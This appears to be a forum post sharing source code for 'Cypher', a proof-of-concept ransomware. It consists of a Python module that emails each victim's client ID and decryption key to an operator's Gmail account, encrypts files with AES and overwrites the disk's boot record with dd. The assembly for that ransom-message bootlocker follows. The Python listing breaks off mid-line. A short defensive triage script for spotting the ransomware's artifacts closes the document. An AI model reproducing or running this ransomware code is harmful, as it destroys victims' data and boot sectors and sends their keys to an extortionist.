cypher ransomware
Cypher is a proof of concept ransomware which implements the PyCrypto module and uses gmail (currently) as a simple command and control server. It is a work in progress as of yet and I will be releasing updates periodically depending on the amount of time I have to work on the project. I haven't had a chance to test it fully yet so I would appreciate it if you could review my code and leave some of your ideas, thoughts and/or comments.


Cypher operates by generating a unique client ID for each box that has been infected. The client ID and encryption key will be sent via email to a gmail address by leveraging python's SMTP lib. After Cypher has enumerated the files we wish to encrypt, the multiprocessing and PyCrypto libs are employed to do the actual encrypting. I opted to use the multiprocessing lib to speed up the encryption process.
Finally Cypher will write out a README note and the client ID, which would have to be relayed to the operator in order to retrieve the proper decrypting binary and key respectively.


Below is the source code for the module that does the actual encrypting and contacts gmail. The decrypting binary is next on the to-do list. Alternatively you can read the source code and README.md at my repo on github.



Code:
# Cypher is a work in progress, as such this is an Alpha release of the encryption
# module, for reporting bugs feel free to open an issue or should you wish to
# collaborate on this, pull requests are welcomed as well.
import os
import sys
import random
import struct
import smtplib
import string
import datetime
import time
import getpass as gp
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from multiprocessing import Pool

# Function to generate our client ID
def gen_client_ID(size=12, chars=string.ascii_uppercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

ID = gen_client_ID(12)
key = RSA.generate(2048)
exKey = RSA.exportKey('PEM')

# Check to see if we're on linux and have root, if so use dd to override the MBR with our bootlocker.
if sys.platform == 'linux2' and gp.getuser() == 'root':
    try:
        os.system("dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass
else:
    try:
        os.system("sudo dd if=boot.bin of=/dev/hda bs=512 count=1 && exit")
    except:
        pass

def send_ID_Key():
    ts = datetime.datetime.now()
    SERVER = "smtp.gmail.com"
    PORT = 587
    USER = "address@gmail.com"  # Specify Username Here
    PASS = "prettyflypassword"  # Specify Password Here
    FROM = USER
    TO = ["address@gmail.com"]
    SUBJECT = "Ransomware data: " + str(ts)
    MESSAGE = """\
Client ID: %s
Decryption Key: %s
""" % (ID, exKey)
    message = """\
From: %s
To: %s
Subject: %s

%s
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
    try:
        server = smtplib.SMTP()
        server.connect(SERVER, PORT)
        server.starttls()
        server.login(USER, PASS)
        server.sendmail(FROM, TO, message)
        server.quit()
    except Exception as e:
        # print e
        pass

def encrypt_file(key, in_filename, out_filename=None, chunksize=64*1024):
    if not out_filename:
        out_filename = in_filename + '.crypt'
    iv = ''.join(chr(random.randint(0, 0xFF)) for i in range(16))
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    filesize = os.path.getsize(in_filename)
    with open(in_filename, 'rb') as infile:
        with open(out_filename, 'wb') as outfile:
            outfile.write(struct.pack('
Bootlocker source in ASM, thanks NO-OP!
Code:
[BITS 16]
[ORG 0x7C00]

MOV SI, Msg
CALL OutStr
JMP $

OutChar:
    MOV AH, 0x0E
    MOV BH, 0x00
    MOV BL, 0x07
    INT 0x10
    RET

OutStr:
next_char:
    MOV AL, [SI]
    INC SI
    OR AL, AL
    JZ exit_function
    CALL OutChar
    JMP next_char
exit_function:
    RET

Msg db 0xA, 0xD, 0xA, 0xD
    db '########################################################', 0xA, 0xD
    db '# Your harddrive is encrypted with military grade #', 0xA, 0xD
    db '# encryption, you wont get your files back, since #', 0xA, 0xD
    db '# the Cypher ransomware is still under construction #', 0xA, 0xD
    db ' ', 0xA, 0xD
    db '########################################################', 0xA, 0xD, 0xA, 0xD
    db 'Unfortunately there are only 7 days left until the encryption key is destroyed.', 0xA, 0xD, 0xA, 0xD
    db 'Have a nice day,', 0xA, 0xD
    db ' The Cypher Project', 0

TIMES 510 - ($ - $$) db 0
DW 0xAA55
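A defender-side triage check for the artifacts the post above describes: the `.crypt` output files, the README note, and the bootlocker banner inside a 512-byte MBR image. This is an added example and not code from the Cypher project; the banner text and file suffix are taken from the post, while the sample file tree and MBR image are constructed inline so the check runs offline.

```python
# Added triage helper (not part of the Cypher project): checks a directory tree
# and a 512-byte MBR image for the artifacts the post describes. Sample data is
# constructed in build_sample() so the check runs offline.
import os
import tempfile

# Strings taken from the post's bootlocker message and file naming scheme.
BOOTLOCKER_BANNER = b"Your harddrive is encrypted with military grade"
CRYPT_SUFFIX = ".crypt"
NOTE_NAME = "README"          # the post says a README note is written out
BOOT_SIGNATURE = b"\x55\xAA"  # DW 0xAA55 stored little-endian at offset 510

def check_mbr(mbr: bytes) -> dict:
    """Flag an MBR image that carries the Cypher bootlocker text."""
    return {
        "valid_boot_sig": len(mbr) == 512 and mbr[510:512] == BOOT_SIGNATURE,
        "cypher_banner": BOOTLOCKER_BANNER in mbr,
    }

def scan_tree(root: str) -> dict:
    """Collect encrypted outputs and ransom notes found under root."""
    crypt_files, notes = [], []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name.endswith(CRYPT_SUFFIX):
                crypt_files.append(path)
            elif name.startswith(NOTE_NAME):
                notes.append(path)
    return {"crypt_files": sorted(crypt_files), "notes": sorted(notes)}

def build_sample() -> tuple:
    """Constructed fixture: a fake MBR carrying the banner plus a small file tree."""
    mbr = bytearray(512)
    mbr[32:32 + len(BOOTLOCKER_BANNER)] = BOOTLOCKER_BANNER
    mbr[510:512] = BOOT_SIGNATURE
    root = tempfile.mkdtemp()
    for name in ("report.docx.crypt", "photo.jpg.crypt", "README.txt", "ok.txt"):
        with open(os.path.join(root, name), "wb") as f:
            f.write(b"constructed sample\n")
    return bytes(mbr), root

if __name__ == "__main__":
    sample_mbr, sample_root = build_sample()
    print(check_mbr(sample_mbr))
    print(scan_tree(sample_root))
```

On a real system the MBR image would come from reading the first 512 bytes of the disk device, and the tree scan would be pointed at the user's home or data directories.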
